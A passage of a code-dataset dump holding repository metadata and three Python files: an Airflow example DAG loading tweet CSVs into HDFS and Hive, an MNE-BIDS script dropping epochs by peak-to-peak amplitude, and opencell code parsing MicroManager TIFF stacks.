begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}
| true
| true
|
f7050d4c1a884b3f7c432e8139d4cdcd936b354a
| 7,730
|
py
|
Python
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 1
|
2021-11-04T20:11:58.000Z
|
2021-11-04T20:11:58.000Z
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 20
|
2017-04-18T19:47:46.000Z
|
2020-01-13T04:19:24.000Z
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 2
|
2018-09-15T07:13:01.000Z
|
2021-03-26T07:27:38.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# --------------------------------------------------------------------------------
# Written By: Ekhtiar Syed
# Last Update: 8th April 2016
# Caveat: This Dag will not run because of missing scripts.
# The purpose of this is to give you a sample of a real world example DAG!
# --------------------------------------------------------------------------------
# --------------------------------------------------------------------------------
# Load The Dependencies
# --------------------------------------------------------------------------------
"""
This is an example dag for managing twitter data.
"""
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
# --------------------------------------------------------------------------------
# Create a few placeholder scripts. In practice these would be different python
# script files, which are imported in this section with absolute or relative imports
# --------------------------------------------------------------------------------
def fetchtweets():
"""
This is a placeholder for fetchtweets.
"""
def cleantweets():
"""
This is a placeholder for cleantweets.
"""
def analyzetweets():
"""
This is a placeholder for analyzetweets.
"""
def transfertodb():
"""
This is a placeholder for transfertodb.
"""
# --------------------------------------------------------------------------------
# set default arguments
# --------------------------------------------------------------------------------
default_args = {
'owner': 'Ekhtiar',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(5),
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
with DAG(
dag_id='example_twitter_dag',
default_args=default_args,
schedule_interval="@daily"
) as dag:
# --------------------------------------------------------------------------------
# This task should call Twitter API and retrieve tweets from yesterday from and to
# for the four twitter users (Twitter_A,..,Twitter_D) There should be eight csv
# output files generated by this task and naming convention
# is direction(from or to)_twitterHandle_date.csv
# --------------------------------------------------------------------------------
fetch_tweets = PythonOperator(
task_id='fetch_tweets',
python_callable=fetchtweets
)
# --------------------------------------------------------------------------------
# Clean the eight files. In this step you can get rid of or cherry pick columns
# and different parts of the text
# --------------------------------------------------------------------------------
clean_tweets = PythonOperator(
task_id='clean_tweets',
python_callable=cleantweets
)
clean_tweets << fetch_tweets
# --------------------------------------------------------------------------------
# In this section you can use a script to analyze the twitter data. Could simply
# be a sentiment analysis through algorithms like bag of words or something more
# complicated. You can also take a look at Web Services to do such tasks
# --------------------------------------------------------------------------------
analyze_tweets = PythonOperator(
task_id='analyze_tweets',
python_callable=analyzetweets
)
analyze_tweets << clean_tweets
# --------------------------------------------------------------------------------
# Although this is the last task, we need to declare it before the next tasks as we
# will use set_downstream This task will extract summary from Hive data and store
# it to MySQL
# --------------------------------------------------------------------------------
hive_to_mysql = PythonOperator(
task_id='hive_to_mysql',
python_callable=transfertodb
)
# --------------------------------------------------------------------------------
# The following tasks are generated using for loop. The first task puts the eight
# csv files to HDFS. The second task loads these files from HDFS to respected Hive
# tables. These two for loops could be combined into one loop. However, in most cases,
# you will be running different analysis on your incoming incoming and outgoing tweets,
# and hence they are kept separated in this example.
# --------------------------------------------------------------------------------
from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
yesterday = date.today() - timedelta(days=1)
dt = yesterday.strftime("%Y-%m-%d")
# define where you want to store the tweets csv file in your local directory
local_dir = "/tmp/"
# define the location where you want to store in HDFS
hdfs_dir = " /tmp/"
for channel in to_channels:
file_name = "to_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
for channel in from_channels:
file_name = "from_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
| 37.892157
| 91
| 0.527167
|
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
def fetchtweets():
def cleantweets():
def analyzetweets():
def transfertodb():
default_args = {
'owner': 'Ekhtiar',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(5),
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
with DAG(
dag_id='example_twitter_dag',
default_args=default_args,
schedule_interval="@daily"
) as dag:
fetch_tweets = PythonOperator(
task_id='fetch_tweets',
python_callable=fetchtweets
)
clean_tweets = PythonOperator(
task_id='clean_tweets',
python_callable=cleantweets
)
clean_tweets << fetch_tweets
analyze_tweets = PythonOperator(
task_id='analyze_tweets',
python_callable=analyzetweets
)
analyze_tweets << clean_tweets
hive_to_mysql = PythonOperator(
task_id='hive_to_mysql',
python_callable=transfertodb
)
from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
yesterday = date.today() - timedelta(days=1)
dt = yesterday.strftime("%Y-%m-%d")
local_dir = "/tmp/"
hdfs_dir = " /tmp/"
for channel in to_channels:
file_name = "to_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
for channel in from_channels:
file_name = "from_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
| true
| true
|
f7050dd5698de7872ec97699e5e318cacda83a76
| 4,510
|
py
|
Python
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 31
|
2019-01-30T11:33:23.000Z
|
2021-02-19T19:30:50.000Z
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 207
|
2019-01-29T16:31:26.000Z
|
2021-03-26T13:28:26.000Z
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 26
|
2019-01-29T18:05:11.000Z
|
2021-03-17T08:46:52.000Z
|
"""
========================================================
06. Remove epochs based on peak-to-peak (PTP) amplitudes
========================================================
Epochs containing peak-to-peak above the thresholds defined
in the 'reject' parameter are removed from the data.
This step will drop epochs containing non-biological artifacts
but also epochs containing biological artifacts not sufficiently
corrected by the ICA or the SSP processing.
"""
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=cfg.task,
acquisition=cfg.acq,
run=None,
recording=cfg.rec,
space=cfg.space,
suffix='epo',
extension='.fif',
datatype=cfg.datatype,
root=cfg.deriv_root,
check=False)
infile_processing = cfg.spatial_filter
fname_in = bids_path.copy().update(processing=infile_processing)
fname_out = bids_path.copy().update(processing='clean')
msg = f'Input: {fname_in}, Output: {fname_out}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
# Get rejection parameters and drop bad epochs
epochs = mne.read_epochs(fname_in, preload=True)
reject = config.get_reject(epochs=epochs)
if cfg.ica_reject is not None:
for ch_type, threshold in cfg.ica_reject.items():
if (ch_type in reject and
threshold < reject[ch_type]):
# This can only ever happen in case of
# reject = 'autoreject_global'
msg = (f'Adjusting PTP rejection threshold proposed by '
f'autoreject, as it is greater than ica_reject: '
f'{ch_type}: {reject[ch_type]} -> {threshold}')
logger.info(**gen_log_kwargs(message=msg,
subject=subject, session=session))
reject[ch_type] = threshold
msg = f'Using PTP rejection thresholds: {reject}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
n_epochs_before_reject = len(epochs)
epochs.reject_tmin = cfg.reject_tmin
epochs.reject_tmax = cfg.reject_tmax
epochs.drop_bad(reject=reject)
n_epochs_after_reject = len(epochs)
if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
msg = ('More than 50% of all epochs rejected. Please check the '
'rejection thresholds.')
logger.warning(**gen_log_kwargs(message=msg, subject=subject,
session=session))
elif n_epochs_after_reject == 0:
raise RuntimeError('No epochs remaining after peak-to-peak-based '
'rejection. Cannot continue.')
msg = 'Saving cleaned, baseline-corrected epochs …'
epochs.apply_baseline(cfg.baseline)
epochs.save(fname_out, overwrite=True)
def get_config(
subject: Optional[str] = None,
session: Optional[str] = None
) -> BunchConst:
cfg = BunchConst(
task=config.get_task(),
datatype=config.get_datatype(),
acq=config.acq,
rec=config.rec,
space=config.space,
baseline=config.baseline,
reject_tmin=config.reject_tmin,
reject_tmax=config.reject_tmax,
spatial_filter=config.spatial_filter,
ica_reject=config.get_ica_reject(),
deriv_root=config.get_deriv_root(),
decim=config.decim
)
return cfg
def main():
"""Run epochs."""
parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
logs = parallel(
run_func(cfg=get_config(), subject=subject, session=session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions())
)
config.save_logs(logs)
if __name__ == '__main__':
main()
| 34.692308
| 79
| 0.601774
|
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=cfg.task,
acquisition=cfg.acq,
run=None,
recording=cfg.rec,
space=cfg.space,
suffix='epo',
extension='.fif',
datatype=cfg.datatype,
root=cfg.deriv_root,
check=False)
infile_processing = cfg.spatial_filter
fname_in = bids_path.copy().update(processing=infile_processing)
fname_out = bids_path.copy().update(processing='clean')
msg = f'Input: {fname_in}, Output: {fname_out}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
epochs = mne.read_epochs(fname_in, preload=True)
reject = config.get_reject(epochs=epochs)
if cfg.ica_reject is not None:
for ch_type, threshold in cfg.ica_reject.items():
if (ch_type in reject and
threshold < reject[ch_type]):
msg = (f'Adjusting PTP rejection threshold proposed by '
f'autoreject, as it is greater than ica_reject: '
f'{ch_type}: {reject[ch_type]} -> {threshold}')
logger.info(**gen_log_kwargs(message=msg,
subject=subject, session=session))
reject[ch_type] = threshold
msg = f'Using PTP rejection thresholds: {reject}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
n_epochs_before_reject = len(epochs)
epochs.reject_tmin = cfg.reject_tmin
epochs.reject_tmax = cfg.reject_tmax
epochs.drop_bad(reject=reject)
n_epochs_after_reject = len(epochs)
if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
msg = ('More than 50% of all epochs rejected. Please check the '
'rejection thresholds.')
logger.warning(**gen_log_kwargs(message=msg, subject=subject,
session=session))
elif n_epochs_after_reject == 0:
raise RuntimeError('No epochs remaining after peak-to-peak-based '
'rejection. Cannot continue.')
msg = 'Saving cleaned, baseline-corrected epochs …'
epochs.apply_baseline(cfg.baseline)
epochs.save(fname_out, overwrite=True)
def get_config(
subject: Optional[str] = None,
session: Optional[str] = None
) -> BunchConst:
cfg = BunchConst(
task=config.get_task(),
datatype=config.get_datatype(),
acq=config.acq,
rec=config.rec,
space=config.space,
baseline=config.baseline,
reject_tmin=config.reject_tmin,
reject_tmax=config.reject_tmax,
spatial_filter=config.spatial_filter,
ica_reject=config.get_ica_reject(),
deriv_root=config.get_deriv_root(),
decim=config.decim
)
return cfg
def main():
parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
logs = parallel(
run_func(cfg=get_config(), subject=subject, session=session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions())
)
config.save_logs(logs)
if __name__ == '__main__':
main()
| true
| true
|
f7050e55af4a52ddeec20cfc5c797671967bb328
| 19,712
|
py
|
Python
|
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | 2
|
2022-02-17T16:24:49.000Z
|
2022-03-02T22:26:48.000Z
|
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | null | null | null |
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | null | null | null |
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class MicroManagerTIFF:
def __init__(self, src_filepath, verbose=True):
'''
'''
self.verbose = verbose
self.src_filepath = src_filepath
self.events = []
self.global_metadata = {'processing_timestamp': timestamp()}
self.open_tiff()
def event_logger(self, message):
'''
'''
if self.verbose:
print('EVENT: %s' % message)
self.events.append({'message': message, 'timestamp': timestamp()})
def save_events(self, dst_filepath):
if not self.events:
return
pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)
def save_global_metadata(self, dst_filepath):
with open(dst_filepath, 'w') as file:
json.dump(self.global_metadata, file)
def save_mm_metadata(self, dst_filepath):
self.mm_metadata.to_csv(dst_filepath, index=False)
def calc_hash(self):
'''
Calculate the sha1 hash from the file contents
'''
sha1 = hashlib.sha1()
with open(self.src_filepath, 'rb') as file:
sha1.update(file.read())
hash_value = sha1.hexdigest()
self.global_metadata['sha1_hash'] = hash_value
return hash_value
def open_tiff(self):
'''
Open the stack using tifffile.TiffFile
'''
self.tiff = tifffile.TiffFile(self.src_filepath)
@staticmethod
def _parse_mm_tag_schema_v1(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'old' schema
(KC: I believe this schema corresponds to MicroManager 1.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag['AndorEMCCD-Exposure'],
'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
}
return metadata
@staticmethod
def _parse_mm_tag_schema_v2(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'new' schema
(KC: I believe this schema corresponds to MicroManager 2.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
}
return metadata
def parse_micromanager_metadata(self):
'''
Parse the MicroManager metadata for each page in the TIFF file
'''
# the IJMetadata appears only in the first page
ij_metadata = None
try:
ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
except Exception:
self.event_logger('There was no IJMetadata tag found on the first page')
if ij_metadata is not None:
try:
ij_metadata = json.loads(ij_metadata)
except Exception:
self.event_logger('IJMetadata could not be parsed by json.loads')
mm_metadata_rows = []
for ind, page in enumerate(self.tiff.pages):
mm_metadata_row = {
'page_ind': ind,
'error': False
}
mm_tag = page.tags.get('MicroManagerMetadata')
if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
mm_metadata_row['error'] = True
mm_metadata_rows.append(mm_metadata_row)
continue
try:
page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
except Exception:
page_metadata_v1 = None
try:
page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
except Exception:
page_metadata_v2 = None
page_metadata = {}
mm_metadata_version = None
if page_metadata_v1 is not None:
mm_metadata_version = 'v1'
page_metadata = page_metadata_v1
elif page_metadata_v2 is not None:
mm_metadata_version = 'v2'
page_metadata = page_metadata_v2
else:
mm_metadata_row['error'] = True
self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)
mm_metadata_rows.append({**mm_metadata_row, **page_metadata})
self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# the channels we expect to find in a Pipeline-like TIFF
self.laser_405 = '405'
self.laser_488 = '488'
def validate_micromanager_metadata(self):
'''
Validate the parsed MicroManager metadata tags for a raw Pipeline-like TIFF file
(these are TIFFs found in the 'PlateMicroscopy' directory)
Generates validated_mm_metadata and sets various flags
that determine whether and how to split the pages into the 405 and 488 channels
Steps
------
- drop rows with any NAs
- check that the dropped rows had a parsing error
- check for two channel_inds and an equal number of pages from each
- if there are no channel_inds, check for an even number of pages
- if there are two channel_inds, check that slice_inds
and exposure settings are consistent within each channel
'''
# whether the MM metadata has two channel inds with an equal number of slices
self.has_valid_channel_inds = False
# whether the MM metadata for each channel has slice_inds that increment by one
self.has_valid_slice_inds = False
# whether it is safe to split the TIFF stack into channels by splitting the pages in half,
# when there are not valid channel inds
self.safe_to_split_in_half = False
md = self.mm_metadata.copy()
# remove the error flag column
errors = md['error']
md = md.drop(labels='error', axis=1)
# drop rows with NAs in any of the columns parsed from the MicroManagerMetadata tag
parsed_columns = set(md.columns).difference(['page_ind'])
md = md.dropna(how='any', subset=parsed_columns, axis=0)
# check that the dropped rows had an error
# (note that 'error' means either there was no MM tag or it could not be parsed)
num_error_rows = errors.sum()
num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
if num_dropped_rows != num_error_rows:
self.event_logger(
'%s rows with NAs were dropped but %s rows had errors'
% (num_dropped_rows, num_error_rows)
)
# check that we can coerce the parsed columns as expected
int_columns = ['slice_ind', 'channel_ind']
for column in int_columns:
md[column] = md[column].apply(int)
float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
for column in float_columns:
md[column] = md[column].apply(float)
# if there are two distinct channels, we assign the first to 405 and the second to 488
self.channel_inds = None
unique_channel_inds = sorted(md.channel_ind.unique())
if len(unique_channel_inds) == 2:
self.channel_inds = {
self.laser_405: min(unique_channel_inds),
self.laser_488: max(unique_channel_inds),
}
# if there are three channel_inds, we assume the third channel is brightfield
elif set(unique_channel_inds) == set([0, 1, 2]):
self.event_logger('There were three channel inds')
self.channel_inds = {
self.laser_405: 0,
self.laser_488: 1,
}
# if there's one channel index, check for an even number of pages
elif len(unique_channel_inds) == 1:
if np.mod(md.shape[0], 2) == 0:
self.safe_to_split_in_half = True
else:
self.event_logger('There is one channel_ind and an odd number of pages')
else:
self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)
# if there were valid channel_inds, check for an equal number of pages from each channel
if self.channel_inds is not None:
num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
if num_405 == num_488:
self.has_valid_channel_inds = True
else:
self.event_logger(
'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
)
# in each channel, check that slice_ind increments by 1.0
# and that exposure time and laser power are consistent
for channel_ind in unique_channel_inds:
md_channel = md.loc[md.channel_ind == channel_ind]
steps = np.unique(np.diff(md_channel.slice_ind))
# check that slice inds are contiguous
if len(steps) == 1 and steps[0] == 1:
self.has_valid_slice_inds = True
elif len(steps) == 1:
self.event_logger(
'Unexpected slice_ind increment %s for channel_ind %s'
% (steps[0], channel_ind)
)
elif len(steps) > 1:
self.event_logger(
'The slice_inds are not contiguous for channel_ind %s' % channel_ind
)
for column in float_columns:
steps = np.unique(np.diff(md_channel[column]))
if len(steps) > 1 or steps[0] != 0:
self.event_logger(
'Inconsistent values found in column %s for channel_ind %s'
% (column, channel_ind)
)
self.validated_mm_metadata = md
@staticmethod
def tag_and_coerce_metadata(row, tag):
'''
Transform `row` to a dict, prepend the keys with `tag`,
and do some hackish type coercion
'''
d = {}
for key, val in dict(row).items():
key = '%s_%s' % (key, tag)
try:
val = float(val)
except Exception:
pass
d[key] = val
return d
def split_channels(self):
'''
Split the pages of the pipeline-like TIFF into 405 and 488 channels
to construct the z-stack for each channel and, if possible,
extract the channel-specific MM metadata (i.e., exposure time and laser power)
Overview
--------
In a perfect world, this would be easy: we would simple use the two unique channel_inds
to split the pages by channel (and verify the page order using the slice_inds).
Unfortunately, due to a bug, the MM metadata tag in some TIFFs is the same on every page
(this is notably true for 'disentangled' TIFFs from Plates 16,17,18).
In these cases, we split the tiff into channels simply by splitting the pages in half.
Note that we use the flags set in self.validate_mm_metadata to determine
which of these methods to use.
Assignment of channels
----------------------
When there are two valid channel_inds, the 405 laser is assigned
to the lower channel_ind (which is either 0 or -1).
When there are no channel_inds, the 405 laser is assigned
to the first half of the pages.
'''
self.did_split_channels = True
self.stacks = {}
md = self.validated_mm_metadata.copy()
if self.has_valid_channel_inds:
for channel_name in (self.laser_405, self.laser_488):
channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
self.global_metadata.update(
self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
)
self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)
elif self.safe_to_split_in_half:
n = int(md.shape[0]/2)
self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
else:
self.event_logger('Unable to safely split pages by channel')
self.did_split_channels = False
def concat_pages(self, page_inds):
'''
'''
stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
return stack
def project_stack(self, channel_name, axis, dst_filepath=None):
'''
Generate x-, y-, or z-projections and log the max and min intensities
'''
axis_inds = {'x': 1, 'y': 2, 'z': 0}
if axis not in axis_inds.keys():
raise ValueError("Axis must be one of 'x', 'y', or 'z'")
axis_ind = axis_inds[axis]
try:
proj = self.stacks[channel_name].max(axis=axis_ind)
minmax = {
'min_intensity': int(proj.min()),
'max_intensity': int(proj.max()),
}
self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
if dst_filepath is not None:
tifffile.imsave(dst_filepath, proj)
except Exception:
self.event_logger(
'An error occured while %s-projecting the %s channel' % (axis, channel_name)
)
def calculate_z_profiles(self, channel):
'''
Calculate various statistics of the intensities for each z-slice
'''
stack = self.stacks[channel]
return {
'min': np.array([zslice.min() for zslice in stack]).astype(int),
'max': np.array([zslice.max() for zslice in stack]).astype(int),
'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
}
@staticmethod
def find_cell_layer(stack):
'''
Estimate the center of the cell layer using the center of mass
of the z-profile of the mean intensity of the Hoechst staining
'''
# z-profile of the mean intensity in the Hoechst channel
raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)
profile = raw_profile - raw_profile.mean()
profile[profile < 0] = 0
x = np.arange(len(profile))
center_of_mass = (profile * x).sum()/profile.sum()
return center_of_mass, raw_profile
def align_cell_layer(
self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
):
'''
Approximately align the 405 and 488 stacks to correct for chromatic aberration,
and crop around the cell layer so that it is in the center of the stack
cell_layer_bottom : the position of the bottom of the cell layer, in microns,
relative to the center of the cell layer (should be negative)
cell_layer_top : the position of the top of cell layer, in microns,
relative to the center (should be positive)
step_size : the z-step size of the stack (in microns)
(note that the step size is not included in the MicroManager metadata,
so it must be provided by the user)
bottom_wiggle_room : optional 'wiggle room', in microns, for the cell_layer_bottom;
if the actual bottom of the stack is within this distance of cell_layer_bottom,
the stack is still cropped, and the bottom of the cropped stack padded with zeros.
For example, if cell_layer_bottom is -5um but the actual bottom is at -4.5um,
setting bottom_wiggle_room to 1um would allow the stack to be cropped
(because -4.5 + 5 < 1)
'''
stacks = {}
result = {}
stack_405 = self.stacks[self.laser_405].copy()
stack_488 = self.stacks[self.laser_488].copy()
# hard-coded chromatic aberration offset in microns
# this is an empirically estimated median offset,
# obtained by inspecting z-stacks from nucleus-localized targets
chromatic_aberration_offset = 1.0
offset_ind = int(chromatic_aberration_offset/step_size)
stack_405 = stack_405[:-offset_ind, :, :]
stack_488 = stack_488[offset_ind:, :, :]
# estimate the cell layer center and round it the nearest z-slice
cell_layer_center, _ = self.find_cell_layer(stack_405)
cell_layer_center = np.round(cell_layer_center)
# absolute position, in number of z-slices, of the top and bottom of the cell layer
bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))
# log some parameters (for debugging, mostly)
result['padded'] = False
result['stack_shape'] = stack_405.shape
result['crop_window'] = [bottom_ind, top_ind]
result['cell_layer_center'] = cell_layer_center
result['chromatic_aberration_offset'] = offset_ind
pad_depth = None
if bottom_ind < 0:
if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
pad_depth = abs(bottom_ind)
bottom_ind = 0
else:
result['error'] = 'The cell layer center was too close to the bottom of the stack'
return stacks, result
if top_ind >= stack_405.shape[0]:
result['error'] = 'The cell layer center was too close to the top of the stack'
return stacks, result
stack_405 = stack_405[bottom_ind:top_ind, :, :]
stack_488 = stack_488[bottom_ind:top_ind, :, :]
# pad the bottom of the stack if necessary
if pad_depth:
result['padded'] = True
result['pad_depth'] = pad_depth
padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
stack_405 = np.concatenate((padding, stack_405), axis=0)
stack_488 = np.concatenate((padding, stack_488), axis=0)
stacks = {'405': stack_405, '488': stack_488}
return stacks, result
| 38.20155
| 98
| 0.605976
|
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
